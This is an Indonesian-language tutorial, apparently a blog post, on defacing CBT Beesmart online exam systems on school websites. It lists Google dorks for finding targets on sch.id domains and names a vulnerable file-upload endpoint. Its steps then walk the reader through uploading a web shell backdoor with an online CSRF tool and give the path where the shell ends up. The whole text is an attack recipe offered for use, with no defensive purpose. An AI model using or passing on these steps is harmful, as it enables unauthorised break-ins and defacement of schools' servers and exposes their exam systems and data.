Hallo semua, pada kesempatan kali ini saya akan membahas bagaimana cara deface poc CBT Beesmart. Oke tanpa basa-basi langsung aja ke tutorialnya.

Hal yang perlu kalian siapin :

- CSRF online (Klik disini)

- Shell backdoor

- Kesabaran yang maksimal.


Dork :

- inurl:/panel/ site:sch.id

- inurl:/login.php intext:"Ujian"

- inurl:/login.php site:sch.id

- inurl:/login.php ujian site:sch.id


Exploit :

- /panel/pages/upload-file.php

- [path]/panel/pages/upload-file.php


Oke, berikut langkah-langkahnya :


1. Langkah pertama, Kalian cari dulu targetnya menggunakan google dork yang sudah saya sediakan di atas, oh ya dork ini bersifat umum jadi ga semua site yang muncul adalah CBT Beesmart, kalian tinggal cari aja satu per satu sampai ketemu CBT Beesmart.


2. Kedua, ketika kalian sudah menemukan targetnya, kalian tinggal masukkin aja exploit yang ada diatas, kalau blank kemungkinan itu vuln.


3. Ketiga, setelah itu kalian ke CSRF online nya, masukkan site target disertai dengan exploitnya, contoh : https://smkn1anonimus.sch.id/panel/pages/upload-file.php atau https://smkn1anonimus.sch.id/[path]/panel/pages/upload-file.php , dan pada bagian post file nya kalian ketik aja uploadfile lalu tekan "lock target", disini kalian tinggal upload shell backdoor atau terserah.


4. Keempat, tanda nya jika berhasil terupload kalian akan otomatis ke redirect dan bakalan ada tulisan "success"


5. Kelima, shell bakalan ada di https://smkn1anonimus.sch.id/images/shellkalian.php atau /[path]/images/shellkalian.php


Oke sekian tutorial dari saya, thanks sudah membaca:D